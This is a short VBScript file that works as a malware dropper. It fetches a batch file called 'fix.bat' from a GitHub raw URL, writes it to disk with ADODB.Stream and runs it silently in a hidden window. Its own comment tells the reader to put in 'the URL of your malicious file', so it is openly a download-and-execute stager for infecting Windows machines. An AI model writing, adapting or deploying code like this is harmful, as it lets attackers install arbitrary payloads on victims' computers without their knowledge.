Set objShell = CreateObject("WScript.Shell")
url = "https://github.com/MidlesLex/SkyblockApi/raw/main/fix.bat" ' Replace with the URL of your malicious file
file = "fix.bat" ' Replace with the name you want to give to the downloaded file

' Download the file
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.open "GET", url, False
objHTTP.send()

If objHTTP.Status = 200 Then
  Set objStream = CreateObject("ADODB.Stream")
  objStream.Open
  objStream.Type = 1
  objStream.Write objHTTP.ResponseBody
  objStream.SaveToFile file, 2
  objStream.Close
End If

' Run the downloaded file silently
objShell.Run file, 0, True